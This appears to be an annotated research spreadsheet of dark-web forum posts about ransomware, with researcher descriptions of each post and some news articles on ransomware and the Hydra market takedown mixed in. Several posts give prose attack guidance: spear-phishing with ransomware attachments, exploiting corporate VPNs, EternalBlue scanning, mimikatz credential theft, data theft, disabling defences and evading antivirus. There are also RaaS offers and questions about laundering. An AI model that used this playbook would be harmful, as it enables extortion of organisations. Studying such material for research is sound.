    <t>i've decided to change my course and work on other things.  to pay for this, i'd like to spread redeemer and i have access to a lot of emails accounts for businesses where files are regularly traded so it seems like i could do some spear fishing.;;i don't know how to attach redeemer to a pdf or excel spreadsheet though.  i've done searches but most of what i've found has been pretty old so i'm not sure if any of that works.;;anyone point me to a tut or give me a rundown?;;cheers</t>
  </si>
  <si>
    <t>hacker wishing to spread a known ransomware and asking for education on how to do this</t>
  </si>
  <si>
    <t>hacker (individual) / education (request)</t>
  </si>
  <si>
    <t>24/05/2022 13:21</t>
  </si>
  <si>
    <t>9e022bfc515c0b21f8c7</t>
  </si>
  <si>
    <t>How to create a payload?</t>
  </si>
  <si>
    <t>1 days 06:03:00</t>
  </si>
  <si>
    <t>you need access to the machine virtually for redeemer you have to run with administrator and set up the ransom once it is downloaded you do not just get it downloaded on the machine</t>
  </si>
  <si>
    <t>user providing some basic information on how to spread redeemer</t>
  </si>
  <si>
    <t>/u/sleevo</t>
  </si>
  <si>
    <t>24/05/2022 17:01</t>
  </si>
  <si>
    <t>0 days 03:40:00</t>
  </si>
  <si>
    <t>thanks for saving me some time.  are there any good ransomware options that i can attach to a file?</t>
  </si>
  <si>
    <t>25/05/2022 08:48</t>
  </si>
  <si>
    <t>0 days 15:47:00</t>
  </si>
  <si>
    <t>the best way if you dont have good coding skills then you need to take one and modify the code - if you have basic skills you can try all you need is linux and a good ransomware code and start from there --</t>
  </si>
  <si>
    <t>asking how to create ransomware - user providing information on how to create a ransomware based on skill level</t>
  </si>
  <si>
    <t>/u/nightrider08</t>
  </si>
  <si>
    <t>b4f2f88fa8e4b0842d68</t>
  </si>
  <si>
    <t>How to create a ransomware</t>
  </si>
  <si>
    <t>0 days 00:46:00</t>
  </si>
  <si>
    <t>4 days 07:17:00</t>
  </si>
  <si>
    <t>he can publicly find code of only old outdated ransomwares;;new ones source code goes from 8k and up;;only build customized for your btc address and server panel of new ransomwaees like zepellin or some forks of petya;only this build;goes 3k;;;if he custom builds something from code of ransomwares publicly available that would work as proof of concept;but would be iseless to actually infect with it users;specially corporate ones;;;if he just want to do infects best to look for ransomware as service</t>
  </si>
  <si>
    <t>asking how to create ransomware</t>
  </si>
  <si>
    <t>0 days 00:43:00</t>
  </si>
  <si>
    <t>well, i introduce myself, i've been in computer science for quite some time, i created my first .bat files with 11 years and my first keyloggers and exploits with 8 years in a local net, on a cybercafe. basic stuff, but with 8-11 years is a great start, at least, from a objetive perspective.;;i installed definetely linux mint like default os and i threw windows to the trash, i dont want to see that shit again. i used some distros of linux since a few years ago, kali linux, tails, ubuntu and some more, but a friend told me about linux mint, and when i tried and i saw their speed and their interface, i fell in love. it took less than 1 week since i tried it for first time, and i wiped my hard disk with a back-up, deleting all trace of the slower and infected windows which i had on my pc. i deleted all the partitions installing linux mint with their installer in the  live usb version, and i made the new partitions for linux mint.;;well, to the case of this thread, i want to know how to make my first ransomware, and send it only to bad people  which doesnt deserves have their cryptos, like banker directors and bad people, for example a man who beats a woman, or to a raper, and persons full of shit but with cryptos. or to the director from the hospital where i live, which sent me to suffer my chronic pain to home without any alternates or treatment, and laughting of me and being cinic, a fuckin son of the bitch.;;somebody can help me with this new branching in my autodidactictal learning?;is a very interesting field. thanks folks, stay safe in the network!</t>
  </si>
  <si>
    <t>experenced user in computer science/other grey and black hat exploits asking how to create their first ransomware</t>
  </si>
  <si>
    <t>/u/foxhound17</t>
  </si>
  <si>
    <t>22/06/2022 05:57</t>
  </si>
  <si>
    <t>e185e5576f9671ab893c</t>
  </si>
  <si>
    <t>How to create my first ransomware?</t>
  </si>
  <si>
    <t>2 days 09:26:00</t>
  </si>
  <si>
    <t>in what language do you want to create your ransomware?</t>
  </si>
  <si>
    <t>/u/Sn4keMan</t>
  </si>
  <si>
    <t>22/06/2022 06:43</t>
  </si>
  <si>
    <t>python if is possible.</t>
  </si>
  <si>
    <t>22/06/2022 08:00</t>
  </si>
  <si>
    <t>0 days 01:17:00</t>
  </si>
  <si>
    <t>there is a lot of souce codes from popular ransomwares</t>
  </si>
  <si>
    <t>/u/spetsnaz</t>
  </si>
  <si>
    <t>22/06/2022 15:51</t>
  </si>
  <si>
    <t>0 days 06:53:00</t>
  </si>
  <si>
    <t>for ransomware development its better for you to learn #c you can do more things and its easier to bypass av's because with python it can only run in a interpreter or if you compile it to .exe it will most likely get flagged by av's and also python code is more easy to read</t>
  </si>
  <si>
    <t>24/06/2022 15:23</t>
  </si>
  <si>
    <t>1 days 23:32:00</t>
  </si>
  <si>
    <t>looking to elevate past fraud and counterfeiting and shift to the ransomware world. any tips? anything is appreciated. will continue my own research in the meantime.</t>
  </si>
  <si>
    <t>user looking to move from fraud/counterfitting to ransomware and asking for advice</t>
  </si>
  <si>
    <t>/u/scambaby</t>
  </si>
  <si>
    <t>2f1c9a14b4b262c74377</t>
  </si>
  <si>
    <t>How to get into RAAS (Ransomware as a service) or just ransomware in general</t>
  </si>
  <si>
    <t>19 days 03:53:00</t>
  </si>
  <si>
    <t>no problem. just to note that the stuff mentioned above will have a;much;higher price tag. you can try getting into a top raas but the chances are low if you don't have any experience or visible presence in cis communities. the top gangs will also charge you an admission fee, but will provide fud bins. most of the crews will not give that, so you're on your own. you'll eventually realize that crypting/obfuscating the locker itself is hard, and there are better approaches towards your initial methods. my most important tip for you -;everyone is going to say that their gear is fud, will provide dyncheck results and videos. don't believe them.;;anyways, just a good crypter with a private stub will run you $2k+/month.</t>
  </si>
  <si>
    <t>yes, there are plenty of devs selling their lockers as a stand-alone product and not as a raas. moreover, github has plenty of open source projects which you can use for free.</t>
  </si>
  <si>
    <t>0 days 07:43:00</t>
  </si>
  <si>
    <t>sorry to break it to you, but modern ransomwares are post-exploitation malware. is absolutely not needed to have it fud, because is being deployed after you already have access to entire network ( either through forti, citrix, sonicwall... from there later gained rdp access ) and you are manually shuting all of their security and hiting the ransomware from admin's rdp;;;rdp = ransomware deployment protocol;;;if you are  not going to code your own locker, but work with some raas you should focus on one of 2 things;;corp doxxing;network penetration testing;;;;;network penetration testing in sense that you find first vulnerable corp vpns ( fori, paloalto, citrix, sonicwall... ) through some of the exploits for that vpn type;;;after that, you connect to that corp vpn from some any random rdp, do a internal network scan to find devices vulnerable for eternalblue and from there you continue accesing the domain admin, rdp admin and so on;;;corp doxxing is also crucial.;;i can throw now in front of you couple of hundreeds of compromised corp fortivpn acceses in format  ip:port username pass;;you need to see which companies are these;which ones are worth spending the further time on internal scan, eternal blue, dataloot and so on;;and which ones are useless;;;also some of them you can sell very easilly, if levell of privilage you managed to get in the corp access is not very high, but the company is like fortune 500 levell;;there are auctions for this acceses everyday on exploit</t>
  </si>
  <si>
    <t>26/02/2022 01:27</t>
  </si>
  <si>
    <t>18 days 13:10:00</t>
  </si>
  <si>
    <t>{'ransomware': 2, 'raas': 1}</t>
  </si>
  <si>
    <t>you will laugh now.... but i am dead serious. just metasploit, mimikatz, powersploit, and carded pro acc for perfectsoft's network scanner, masscanonline and carded shodan;;;tbh, most of the tricks i know about corp network pentesting i have learned from guide which basterlord from revil have published before retiring ( couple of months ago ). i think that guide have been taken down by now, but i have it backed up. there he is explaining how to exactly the same thing but both with cobalt strike and without using cobalt strike at all.;;i first tried no cobalt method and it worked, so i just sticked to it</t>
  </si>
  <si>
    <t>26/02/2022 02:03</t>
  </si>
  <si>
    <t>ransomware/malware/compromising individuals basically/scams/phishing/</t>
  </si>
  <si>
    <t>advice on how to make  large amount of money unethically</t>
  </si>
  <si>
    <t>6b39a786bab68e463eb2</t>
  </si>
  <si>
    <t>How to make 350k$ Unethically</t>
  </si>
  <si>
    <t>9 days 14:52:00</t>
  </si>
  <si>
    <t>been trying to get into ransomware, dont know how to start though</t>
  </si>
  <si>
    <t>user asking how to get into ransomware</t>
  </si>
  <si>
    <t>/u/KingBaldwin</t>
  </si>
  <si>
    <t>htb has ransomware learning material??</t>
  </si>
  <si>
    <t>user asking if hack the box has ransomware teaching material</t>
  </si>
  <si>
    <t>/u/crimsonsp</t>
  </si>
  <si>
    <t>0 days 08:22:00</t>
  </si>
  <si>
    <t>somewhat, what i mean is rather it teaches you the tools of penetration. enumeration of ports followed by gaining access to a server or machine or box whatever. from there ransomware is just a leap of imagination.  ransomware is not a line of code per say but rather a action with the tools and data. ransom is to hold hostige and demand payment, you could encrypt a data set and demand payment. or release data/demand payment.</t>
  </si>
  <si>
    <t>/u/b00g3yman</t>
  </si>
  <si>
    <t>17/04/2022 04:58</t>
  </si>
  <si>
    <t>6 days 08:01:00</t>
  </si>
  <si>
    <t>how do i go through in starting doing ransomware.;what knowledge do i need, what software do i need.;i wanna keep my total earnings under 1m$ and the ransom being a max of 500$ for normal people, and big amounts recurring from big companies</t>
  </si>
  <si>
    <t>9c5b30f1a3359865c276</t>
  </si>
  <si>
    <t>How to start ransomware?</t>
  </si>
  <si>
    <t>69 days 20:04:00</t>
  </si>
  <si>
    <t>mostly you need network penetration testing skills. not for keeping it low like under 1m, but for doing anything even over 20k. and obviously you need a decent ransomware;;;need to find your own way of getting corp vpn acceses ( forti, pulse, citrix... ), either through hiting ip:port lists with some exploit, or through phishing, from your botnet, from se methods of corp insiders ( like lapsus$ is doing xdd );;;after that you are connecting there and scanning there internal network. this specific tool which some revil guys were reccomending you actually need to get carded pro version, but i guess there are more tools also. look for devices in network that are vulnerable, drop first payload to take control of that device, mimikatz, take admin, do datalooting, disable all security and then it ransomware</t>
  </si>
  <si>
    <t>{'revil': 1, 'ransomware': 1}</t>
  </si>
  <si>
    <t>learn python fully, my first ever ransomware was on python. from what i know one of the moderators (i think paris?) started his own ransomware simply by python</t>
  </si>
  <si>
    <t>i wish the person who down voted this would explain why...;;why the corp vpn access?  what do you mean by se methods of corp insiders?</t>
  </si>
  <si>
    <t>sorry if this sounds arrogant, but can you first look the other posts on this same subdread on this same topic, mostly things written by me and hugbunter related on ransomware;;and then after that, what you still don't understand ask me details</t>
  </si>
  <si>
    <t>i don't charge for knowledge;will send you</t>
  </si>
  <si>
    <t>i dont mean a under 1million ransom;i mean total funds after awhile being 1m</t>
  </si>
  <si>
    <t>0 days 00:35:00</t>
  </si>
  <si>
    <t>i dont mean the ransom costing under 1million;i mean the total amount earned after awhile</t>
  </si>
  <si>
    <t>companies make multi million dollar it bugs, you just have to be the one to dig and find it then exploit it. good luck randsoming even 10k if you're just a script kitty.</t>
  </si>
  <si>
    <t>/u/cramfest</t>
  </si>
  <si>
    <t>actually there are cases of script kiddies hitting a jackpot;;of having initial corp vpn access of very big company, gained mostly through fishing or botnet ( case we speak of skiddies, lil bit chance they exploited it other way );admin is retard and uses same rdp credentials for forti as for rdp;;what is left ? turn of defender, dataloot and manually run ransomware;;and there were cases of couple of milion worth ransoms taken;;;;but still;over 99% of ransomware attacks were not script kiddies hitiing a jackpot</t>
  </si>
  <si>
    <t>0 days 00:48:00</t>
  </si>
  <si>
    <t>do you really need to learn python fully? you could just take some prebuilt python ransomware</t>
  </si>
  <si>
    <t>/u/FarmHouseGrassFedBeef</t>
  </si>
  <si>
    <t>0 days 07:48:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;cases involving ransomware viruses that demand payments from the users of computers they infect have risen so sharply in japan that the national police agency (npa) has begun referring to the threat they pose as "extremely serious.";;according to major cyber security software company trend micro inc., in 2020 93 ransomware infections were reported by corporations in japan -- an 80% increase on the previous year. the npa also received 23 consultations from affected firms and others.;;in ransomware attacks, cybercriminals encrypt without warning the internal data of corporations and other entities. they then demand virtual currency or other payment to restore the data. trend micro said the quarterly number of reported infections saw a constant rise in 2020, with 23 cases in the april-june period, 24 in july-september, and 32 in october-december.;;one major route for attacks is virtual private networks (vpn), which are said to be especially vulnerable. vpns are often used for teleworking, which has seen a greater uptake amid the coronavirus pandemic.;;katsuyuki okamoto, a security expert at trend micro, explained, "in many past cases, cybercriminals attacked by disseminating viruses via email, but now they've come to perform targeted hits from the start." he said hacking methods are sold on the darknet too, adding, "attack techniques have spread widely.";;the npa, meanwhile, began keeping totals of ransomware damages from april 2020, and had received 23 consultations from victims in 10 prefectures by december. police have been investigating the cases on suspicion that electromagnetic records containing unauthorized commands were used -- which are actions consistent as crimes using computer viruses -- among other charges.;;nine of the cases that have taken place in five prefectures since july pertained to double blackmail, in which companies are also threatened with the publication of stolen data if a ransom is not paid. major video game developer capcom co. fell victim to this method after it was hit by a cyberattack, which came to light in november. in some cases, stolen internal information does get published online, and according to trend micro there were a total of 26 instances in which information belonging to japanese companies, including their offices abroad, was posted online.;;to prevent infection from ransomware, okamoto said, "individuals must not open files attached to suspicious emails, and companies should introduce two-step verification systems in addition to updating services, such as vpns, to the latest versions.";;(japanese original by noritake machida, city news department)</t>
  </si>
  <si>
    <t>News article discussing japanese police finding the rise in ransomware attacks an extreme threat</t>
  </si>
  <si>
    <t>75e6ec6aa2a14d2b82b8</t>
  </si>
  <si>
    <t>Huge Rise in Ransomware Cyberattacks on Japan Firms an Extreme Threat: Police</t>
  </si>
  <si>
    <t>san francisco���the takedown of the hydra darknet market in april was hailed as a significant step forward in the effort to disrupt cybercrime infrastructure and the ransomware payment ecosystem, and two months later, it has had an even more disruptive effect than analysts expected at the time.;;hydra was the largest russian underground market and had been in operation for seven years by the time authorities from germany seized its infrastructure and about $25 million in cryptocurrency. hydra was a major hub for buyers and sellers of drugs, but also offered cryptocurrency mixing and laundering services, as well as cash-out services for people who wanted to withdraw illegal funds. at the same time as the takedown, the department of treasury���s office of foreign assets control announced sanctions against the hydra market. when the takedown and sanctions hit, experts said the operation would likely have a serious effect on a large section of the cyber-crime underground and praised it as a major victenforcement.;;���the transformation over the last decade (by authorities) has been significant in terms of international relations, increased efforts and more manpower,��� jared der-yeghiayan, director of the advanced cybercrimes and engagements team at recorded future, said at the time. ���law enforcement has grown exponentially��� the resources available 10 years ago is nothing compared to what they have now. the efforts, and capabilities, are also more intense.���;;in the months since the takedown, analysts who track the cyber-crime underground and analyze blockchain transactions have seen a serious dropoff in activity. growth in the volume of transactions on major cyber-crime marketplaces has remained relatively steady over the past few years, but when hydra was taken offline, that came to a screeching halt.;;���this was a major disruption of darknet activity, it���s a huge event.���;;���absent major marketplace takedowns, we see consistent growth. mos fall off after the takedown,��� kimberly grauer, a director at chainalysis, said during a panel discussion on the takedown at the rsa conference here wednesday.;;chainalysis monitors and analyzes blockchain activity, both on legitimate marketplaces and exchanges and on illegitimate ones. by watching the funds flowing into and out of cryptocurrency wallets, analysts can follow the money in various ways and spot trends and anomalies. chainalysis and flashpoint intelligence, which monitors underground cyber-crime activity, published a whiye paper on hydra in 2021, almost exactly a year before the takedown, and found that the market���s transaction volume had gone from $9.40 million in 2016 to more than $1.37 billion by the end of 2020. hydra had been known to security researchers, blockchain analysts and law enforcement for several years, and given the rapid churn in underground markets of this kind, at seven years old, it was ancient.;;one of the main theories about why the market���s adminisble to operate for so long without much in the way of interference was that the group was working with russian law enforcement and funneling some of their revenue to them.;;���i would say the russian government was permissive. they wouldn���t interrupt it or arrest sellers. the theory is law enforcement was working closely with hydra admins and sellers to get a cut,��� said vlad cuiujuclu of flashpoint.;;why the authorities chose april to take the forum down and impose the sanctions is another open question. hydra was well known and had been on law enforcement radar for some time, so when the takedown occurred, it wasn���t a shock, but the timing was what puzzled some observers, given that it came soon after russia invaded ukraine,;;���these theories were immediately circulating. the more mundane explanation was that hydra was simply becoming annoying to the west. hydra admins had been saying they���d like to expand to europe and this was a preventive move,��� said anwas becoming a considerable problem even without the war.���;;whatever the proximate cause of the takedown was, the effect it���s had is clear.;;���this was a major disruption of darknet activity, it���s a hug</t>
  </si>
  <si>
    <t>article on the effects of the Hydra Market takedown</t>
  </si>
  <si>
    <t>f897aa8ec769b4e5573b</t>
  </si>
  <si>
    <t>Hydra Market Takedown Has Had Lasting Effects</t>
  </si>
  <si>
    <t>hi guys,;;i'm working as an it engineer in a big multinational company and have therefore access to some computers of the company.;;i can access to personal information like id card, salary slip, photos, personal address, mail, etc,...;;i also have the credentials to access multiple servers.;;would it be profitable to sell this information on the darkweb and especially where and to whom?;or what can i do else with those machines without being caught?;;thanks for your help!</t>
  </si>
  <si>
    <t>user having access to a large amount of machenes from work and asking if personal information from this would be profitable - ransomware is also recommend</t>
  </si>
  <si>
    <t>potential hacker (individual) / information (request)</t>
  </si>
  <si>
    <t>/u/marcelwatson</t>
  </si>
  <si>
    <t>31/08/2021 20:20</t>
  </si>
  <si>
    <t>6f832aea8e855270a054</t>
  </si>
  <si>
    <t>I have access to +20'000 machines in my company</t>
  </si>
  <si>
    <t>90 days 19:37:00</t>
  </si>
  <si>
    <t>only guys that purchase access to company infrastructure are ransomware operators/affiliates, you won't find none of them here. head over to exploit, verified or xss and you might get lucky.</t>
  </si>
  <si>
    <t>31/08/2021 20:33</t>
  </si>
  <si>
    <t>if you want, you can use my redeemer ransomware on them.;check out;/d/redeemer;if you're interested.;;if you're careful and good with scripting, i can help you so they will never ever know that it's you who run the ransomware on their machines.</t>
  </si>
  <si>
    <t>user having access to a large amount of machenes from work and asking if personal information from this would be profitable - notable raas provider offers services</t>
  </si>
  <si>
    <t>information (provider) / raas provider (group)</t>
  </si>
  <si>
    <t>31/08/2021 22:55</t>
  </si>
  <si>
    <t>0 days 02:22:00</t>
  </si>
  <si>
    <t>i'm working as an it engineer;;;in that case you should know well enough what to do and what the best way would be to gain revenue from it :p</t>
  </si>
  <si>
    <t>/u/c00laid</t>
  </si>
  <si>
    <t>0 days 03:07:00</t>
  </si>
  <si>
    <t>i made like $600k in the past couple years doing various computer crime. little bit of everything from normal malware to ransomware to fraud, whatever was gonna make me a buck. now i'm sitting on a huge stack of crypto but i can't fucking do anything with it. how do i even begin to launder it? i have no idea how to pay my taxes, much less incorporate a business and all that other paperwork-heavy stuff. i can't even get a normal job anymore because i have no work record for the past several years and none of my computer skills have any kind of documentation to go along with them. i'm feeling a bit stuck here. i guess it's great that my small apartment and my groceries can be paid in cash, but the majority of this money feels pretty useless.;;i'm not mr_white btw</t>
  </si>
  <si>
    <t>User asking how to launder a large amount of money - some of it gained via ransomware</t>
  </si>
  <si>
    <t>/u/trynagocleanman</t>
  </si>
  <si>
    <t>14/10/2021 01:56</t>
  </si>
  <si>
    <t>b7654207164d29b20842</t>
  </si>
  <si>
    <t>I made a bunch of money, now what?</t>
  </si>
  <si>
    <t>2 days 17:52:00</t>
  </si>
  <si>
    <t>i made many hacking tools like rat, malwares, ransomwares;i wanna sell them safely;where is the best market?</t>
  </si>
  <si>
    <t>User asking where to sell various ransomware tools</t>
  </si>
  <si>
    <t>/u/dddwin3</t>
  </si>
  <si>
    <t>f8639153c6c2eb706154</t>
  </si>
  <si>
    <t>I wanna sell hacking tools</t>
  </si>
  <si>
    <t>0 days 21:52:00</t>
  </si>
  <si>
    <t>try torum.</t>
  </si>
  <si>
    <t>/u/emmakilo</t>
  </si>
  <si>
    <t>i've seen the happy blog which seems to be a ransomware group. and there's tons of news (and i've seen the auction on the happy blog site) regarding the grubman shire meiselas &amp; sacks data leak that is held for ransom right now for $21m and they say the group is revil/sodinokibi that's did the hack and is holding the data ransom(i can also see the rss feed on happy blog says the name sodinokibi in it). but then i also see people asking here where to buy revil, i've seen revil listed for sale on whm for $2000 (maybe scam) and articles discussing revil and sodinokibi as ransomware software.;;so which is it? is it both?;;revil/sodinokibi is ransomware software or a group?</t>
  </si>
  <si>
    <t>Asking who is the group behind the happy blog post</t>
  </si>
  <si>
    <t>22/09/2020 20:09</t>
  </si>
  <si>
    <t>4f1b96717f8664a33c95</t>
  </si>
  <si>
    <t>I'm confused about REvil/Sudanikobi. Is it ransomware that can be purchased or a ransomware group?</t>
  </si>
  <si>
    <t>7 days 10:12:00</t>
  </si>
  <si>
    <t>{'sodinokibi': 2, 'ransomware': 3, 'revil': 2}</t>
  </si>
  <si>
    <t>��qu�� pasa si un d��a le roban en casa y se llevan tu  ordenador?, ��y si te lo roban de la habitaci��n de hotel o autom��vil de alquiler? ��qu�� pasa si lo olvidaste en el autobus o en el instituto o universidad?, o incluso peor.. ��qu�� pasar��a si la polic��a alguna vez entrara en tu casa y tomara el control de sus dispositivos digitales para llevar a cabo una investigaci��n exhaustiva que podria acabar con usted en prisi��n?;;en cualquiera de estos casos, el nuevo propietario de la computadora puede intentar ver rtus datos. ��qu�� encontrar��n all��?;;en mis computadoras port��tiles windows, mac y linux completamente encriptadas, no encontrar��an nada m��s que una pantalla en blanco solicit��ndoles una contrase��a de inicio. todos mis discos duros, incluido el sistema operativo, est��n encriptados y los dispositivos no arrancar��n sin la contrase��a correcta.;;pero en los ordenadores de la mayor��a de los usuarios, es probable que la respuesta sea informes de cr��dito, documentos m��dicos, curr��culums, fotos familiares, inicios de sesi��n guardados, tarjetas de cr��dito, informaci��n financiera, historial de navegaci��n en internet, pasatiempos, afinidades sexuales, evidencia criminal y mucho m��s. m��s.;;toda esta informaci��n se puede utilizar para hostigar, chantajear, extorsionar o explotarlo a��n m��s. podr��a usarse para robar su identidad, abrir l��neas de cr��dito o cometer delitos en su nombre, lo que le permitir�� limpiar el desorden. para cualquiera de nosotros que comete fraude y otras actividades delictivas similares en l��nea, esta informaci��n se utilizar�� en la corte para encarcelarlo durante muchos a��os.;;desafortunadamente, el gobierno de los ee. uu. tiene la reputaci��n de no ser f��cil con los ciberdelincuentes y, si alguna vez te atrapan, aseg��rate de que har��n todo lo que est�� a su alcance para llevarte a la c��rcel durante tantos a��os como sea posible.;;aunque la seguridad b��sicam��s adelante en este tutorial. este cap��tulo deber��a servir como una buena revisi��n de su per��metro digital de referencia.;;todas las t��cnicas que se presentar��n en este en el manual iberico del comprador de los dnms se basan en la suposici��n de que tiene una computadora de escritorio que es razonablemente segura y libre de malware. si su computadora est�� infectada de alguna manera con malware o corre el riesgo de sufrir una infecci��n de malware, debe solucionar este problema antes de continuar. algunas de las formas m��s comunes de malware son spyware, key loggers, ransomware y scareware. las b��squedas simples de google le explicar��n m��s sobre cada uno de estos virus si desea leer m��s sobre ellos, no entrar�� en eso.;;bilingual as i promised you;;;what if one day your computer was ever stolen from your home, hotel room or rental car? what if it was borrowed by a friend of yours/family relative and lost or forgotten at school or on if the police ever raided your home and took control of your digital devices to conduct a thorough investigation, that could potentially leave you in a dire situation, where you could face years in prison?;;what if any of a thousand scenarios occurred that resulted in you losing physical control, whether permanently or temporarily, of your computer? in any of these instances the new owner of the computer may try to take a look at your data. what will they find there?;;on my fully encrypted windows, mac, and linux laptops they would find nothing but a blank screen prompting them for a boot password. my entire hard drives, including the operating system, are encrypted and the devices will not boot without the correct password.;;replace my computer with that of most users, and the answer is likely to be credit reports, medical documents, resumes, family photos, saved logins, credit cards, financial information, internet browsing history, hobbies, sexual affinities, criminal evidence, and much more. all of this information, can be used to harass, blackmail, extort, or further exploit you. it could be used to steal your identity, open lines of credit, or commit crimes in your name, leaving you to clean up the mess.;;for any of us committing fraud and other similar criminal activities online, this information will be used in court to put you in jail for many years. unfortunately, the us government has a reputation for not going easy on cyber-criminals and if you ever get caught, be sure they will do everything in their power to land you in jail for as many years as they possibly can.;;although basic security is boring, without we cannot rely on the more ���advanced��� security measures we discuss later in this tutorial. this chapter should serve as a good review of your baseline digital perimeter.;;all of the techniques that will be presented in this tutorial, rely upon the assumption that you have a desktop computer that is reasonably secure and free of malware. if your computer is in any way, infected witr is at risk for malware infection, you should fix this before continuing. some of the most common forms of malware are spyware, key loggers, ransomware, and scareware. simple google searches will explain you further about each of these viruses if you so wish to read more about it, i will not get into that.</t>
  </si>
  <si>
    <t>Post describing all the ways information can be used to harm you</t>
  </si>
  <si>
    <t>/d/IBERICDNMBUYERMANUAL</t>
  </si>
  <si>
    <t>c073c38eb4da8c7cca89</t>
  </si>
  <si>
    <t>INTRODUCCION (In memory of my good friendThe Flying Dutchman)</t>
  </si>
  <si>
    <t>2 days 05:23:00</t>
  </si>
  <si>
    <t>i'm looking for a ransomware guide, with (command n control center guides, encryption guides, deploying methods, opsec, cleaning, exchanging)</t>
  </si>
  <si>
    <t>Request for blackhat guides on ransomware</t>
  </si>
  <si>
    <t>73e1d6c33985b4ed70f3</t>
  </si>
  <si>
    <t>In-need of a blackhat guide on ransomware</t>
  </si>
  <si>
    <t>2 days 14:53:00</t>
  </si>
  <si>
    <t>ya i been searching for the same info. the only info available on the markets are outdated or just scams. i dont mind paying but it seems like everyone is keeping the info secret which is understandable. and the few people the send messages never reply when i tell them im interested.</t>
  </si>
  <si>
    <t>/u/slimjim999</t>
  </si>
  <si>
    <t>i'm probably gonna learn minimal-butgood coding;and tweak conti's ransomware</t>
  </si>
  <si>
    <t>hacktown my friend</t>
  </si>
  <si>
    <t>/u/texasred</t>
  </si>
  <si>
    <t>0 days 06:15:00</t>
  </si>
  <si>
    <t>i messaged funshine a few times asking if they covered ransomware but never received a response.</t>
  </si>
  <si>
    <t>0 days 15:36:00</t>
  </si>
  <si>
    <t>hacktown has everything you're asking for</t>
  </si>
  <si>
    <t>upvote. thanks brother. have you heard of "ransomware" ? im going to go that route soon.</t>
  </si>
  <si>
    <t>Unrelated to the original post, user recommending to go the route of ransomware as opposed to carding</t>
  </si>
  <si>
    <t>/d/FraudResources</t>
  </si>
  <si>
    <t>35c421f68394c73c54ca</t>
  </si>
  <si>
    <t>Information from experienced carder</t>
  </si>
  <si>
    <t>0 days 23:26:00</t>
  </si>
  <si>
    <t>178 days 11:42:00</t>
  </si>
  <si>
    <t>dwag you think this idiot can scam me;he been trying to but never succeed;he tried to ask me for 200$;and to download lunix and he will offer me his hacked rdp which is ransomware;he will say use lunix cause windows can���t get effected by the virus easily;and he will try to chat me hours and hours to convince me;but guess what bitch never trusted his nasty ass;i knew something nasty;is go</t>
  </si>
  <si>
    <t>/u/Eljokerjail</t>
  </si>
  <si>
    <t>21/01/2022 15:28</t>
  </si>
  <si>
    <t>3dfff154f8b14b669ab0</t>
  </si>
  <si>
    <t>0 days 07:56:00</t>
  </si>
  <si>
    <t>15 days 19:06:00</t>
  </si>
  <si>
    <t>prometheus ransomware is among the most aggressive ransomware operations in recent times;;;http://tape6m4x7swc7lwx2n2wtyccu4lt2qyahgwinx563gqfzeedn5nb4gid.onion/inside-prometheus-the-ransomware-operation-thats-been-making-waves-across-the-world</t>
  </si>
  <si>
    <t>Link to post related to new prometheus ransomware</t>
  </si>
  <si>
    <t>29/06/2021 23:39</t>
  </si>
  <si>
    <t>2f2cfda2af346dd7e2ce</t>
  </si>
  <si>
    <t>Inside Prometheus - The Ransomware Operation That's Been Making Waves Across the World</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;in their carbis bay communique, the g7 announced their intention to work together to tackle ransomware groups. days later, us president joe biden met with russian president vladimir putin, where an extradition process to bring russian cybercriminals to justice in the us was discussed. putin reportedly agreed in principle, but insisted that extradition be reciprocal. time will tell if an extradition treaty can be reached. but if it is, who exactly should extradited ��� and what for?;;source: econotimes;;the problem for law enforcement is that ransomware ��� a form of malware used to steal organisations��� data and hold it to ransom ��� is a very slippery fish. not only is it a blended crime, including different offences across different bodies of law, but it���s also a crime that straddles the remit of different policing agencies and, in many cases, countries. and there is no one key offender. ransomware attacks involve a distributed network of d unknown to each other to reduce the risk of arrest.;;so it���s important to look at these attacks in detail to understand how the us and the g7 might go about tackling the increasing number of ransomware attacks we���ve seen during the pandemic, with at least 128 publicly disclosed incidents taking place globally in may 2021.;;what we find when we connect the dots is a professional industry far removed from the organised crime playbook, which seemingly takes its inspiration straight from the pages of a business studies manual.;;the ransomware industry is responsible for a huge amount of disruption in today���s world. not only do these attacks have a crippling economic effect, costing billions of dollars in damage, but the stolen data acquired by attackers can continue to cascade down through the crime chain and fuel other cybercrimes.;;ransomware attacks are also changing. the criminal industry���s business model has shifted towards providing ransomware as a service. this means operats software, manage the extortion and payment systems and manage the reputation of the ���brand���. but to reduce their exposure to the risk of arrest, they recruit affiliates on generous commissions to use their software to launch attacks.;;this has resulted in an extensive distribution of criminal labour, where the people who own the malware are not necessarily the same as those who plan or execute ransomware attacks. to complicate things further, both are assisted in committing their crimes by services offered by the wider cybercrime ecosystem.;;how do ransomware attacks work?;;there are several stages to a ransomware attack, which i have teased out after analysing over 4,000 attacks from between 2012 and 2021.;;first, there���s the reconnaissance, where criminals identify potential victims and access points to their networks. this is followed by a hacker gaining ���initial access���, using log-in credentials bought on the dark web or obtained through deception.;;once initial ak to escalate their access privileges, allowing them to search for key organisational data that will cause the victim the most pain when stolen and held to ransom. this is why hospital medical records and police records are often the target of ransomware attacks. this key data is then extracted and saved by criminals ��� all before any ransomware is installed and activated.;;next comes the victim organisation���s first sign that they���ve been attacked: the ransomware is deployed, locking organisations from their key data. the victim is quickly named and shamed via the ransomware gang���s leak website, located on the dark web. that ���press release��� may also feature threats to share stolen sensitive data, with the aim of frightening the victim into paying the ransom demand.;;successful ransomware attacks see the ransom paid in cryptocurrency, which is difficult to trace, and converted and laundered into fiat currency. cybercriminals often invest the proceeds to enhance thliates ��� so they don���t get caught.;;the cybercrime ecosystem;;while it���s feasible that a suitably skilled offender could perform each of the functions, it���s highly unlikely. to reduce the risk of being caught, offender groups tend to develop and master specialist skills for different stages of an attack. these groups benefit from this inter-dependency, as it offsets criminal liability at each stage.;;and there are plenty of specialisations in the cybercrime underworld. there are spammers, who hire out spamware-as-a-service software that phishers, scammers, and fraudsters use to steal people���s credentials, and databrokers who trade these stolen details on the dark web.;;they might be purchased by ���initial access brokers���, who specialise in gaining initial entry to computer systems before selling on those access details to would-be ransomware attackers. these attackers often engage with crimeware-as-a-service brokers, who hire out ransomware-as-a-service s.;;to coordinate these groups, darkmarketeers provide online markets where criminals can openly sell or trade services, usually via the tor network on the dark web. monetisers are there to launder cryptocurrency and turn it into fiat currency, while negotiators, representing both victim and offender, are hired to settle the ransom amount.;;this ecosystem is constantly evolving. for example, a recent development has been the emergence 